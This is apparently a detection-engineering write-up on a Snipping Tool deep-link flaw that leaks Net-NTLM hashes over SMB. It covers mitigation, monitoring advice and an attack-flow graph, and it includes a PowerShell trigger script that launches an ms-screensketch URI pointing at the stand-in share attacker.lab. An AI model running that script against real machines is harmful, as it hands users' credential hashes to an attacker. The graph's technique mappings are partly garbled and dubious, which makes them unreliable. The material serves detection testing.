Follow 
Summary
A vulnerability in the Windows Snipping Tool can expose Net-NTLM hashes from the currently logged-in user to a remote attacker. The issue is triggered through a malicious deep link that abuses the ms-screensketch URI scheme, causing Snipping Tool to open a file hosted on an attacker-controlled SMB share. Although the victim must click or open the crafted link, the credential leak itself happens silently in the background when Windows initiates the SMB connection. This behavior can give attackers access to NTLM challenge-response data without any visible warning to the user.
Investigation
Researchers found that the ms-screensketch protocol accepts a filePath parameter and does not properly restrict arbitrary UNC paths. When Snipping Tool attempts to access such a path, Windows automatically tries to authenticate to the remote SMB server, exposing the NTLM response in the process. To validate the issue, the researchers built proof-of-concept scripts that launched an SMB listener and generated a malicious URI capable of capturing the leaked hash.
Mitigation
Microsoft released a security update on April 14, 2026 to address the issue by removing the vulnerable deep link behavior from Snipping Tool. Applying this patch prevents the application from automatically opening attacker-supplied SMB paths through untrusted URIs. Organizations should prioritize deployment of the update across affected Windows systems to eliminate the exposure.
Response
Defenders should monitor for attempts to invoke the ms-screensketch URI scheme and watch for outbound SMB connections to unusual internal or external hosts. Systems that do not require Snipping Tool should have the protocol restricted where possible, and patch deployment should be enforced without delay. Any exposed NTLM hashes should be investigated promptly for signs of replay, relay, or other follow-on abuse.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccffcc %% Nodes action_user_click["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>User clicks a malicious link that triggers execution."] class action_user_click action tool_snipping["<b>Tool</b> – <b>Name</b>: Snipping Tool (ms-screensketch URI)<br/><b>Technique</b>: T1204 User Execution<br/><b>Description</b>: Launched via the msu2011screensketch URI handler."] class tool_snipping tool tech_smb_conn["<b>Technique</b> – <b>T1550.002 Pass the Hash</b><br/>Snipping Tool processes a filePath and initiates an SMB connection to an attackeru2011controlled server, enabling hash capture."] class tech_smb_conn technique tech_hash_capture["<b>Technique</b> – <b>Credential Access</b><br/>Attacker captures the Netu2011NTLM hash from the SMB authentication exchange."] class tech_hash_capture technique tech_lateral["<b>Technique</b> – <b>T1550.002 Pass the Hash</b><br/>Captured hash can be reused for lateral movement or privilege escalation."] class tech_lateral technique tech_c2_web["<b>Technique</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/>Attacker may use HTTP/S web protocols for command and control communication."] class tech_c2_web technique tech_persistence["<b>Technique</b> – <b>T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking</b><br/>Potential persistence through dynamic linker hijacking of the Snipping Tool process."] class tech_persistence technique %% Connections action_user_click –>|executes| tool_snipping tool_snipping –>|initiates SMB| tech_smb_conn tech_smb_conn –>|leads to| tech_hash_capture tech_hash_capture –>|enables| tech_lateral tech_hash_capture –>|enables| tech_c2_web tool_snipping –>|may lead to| tech_persistence "
Attack Flow
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker has obtained a foothold on the victim workstation and wishes to harvest NTLM hashes without raising suspicion. Leveraging CVE‑2026‑33829, the attacker crafts a malicious
ms‑screensketch:URI that points to an attacker‑controlled SMB share (\attacker.labsharepayload.png). When the Snipping Tool processes this URI, Windows automatically initiates an SMB connection to the remote server, leaking the machine’s NTLM response. The attacker executes the URI via PowerShell to ensure the Snipping Tool is invoked in the user context. -
Regression Test Script:
# NTLM Leak via Snipping Tool – trigger script # Adjust the UNC path to point to your controlled listener. $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\\$attackerServer\$sharePath" Write-Host "Invoking Snipping Tool with malicious URI..." Start-Process $uri # Wait a few seconds for the SMB handshake to complete Start-Sleep -Seconds 5 Write-Host "Invocation complete. Check SIEM for EventID 3 with DestinationHostname containing '$attackerServer'." -
Cleanup Commands:
# Remove any residual Snipping Tool processes (if still running) Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # Optional: delete temporary files created on the attacker side (if any) # (Assumes you have write access to the share) # Remove-Item -Path "\$attackerServer$sharePath" -Force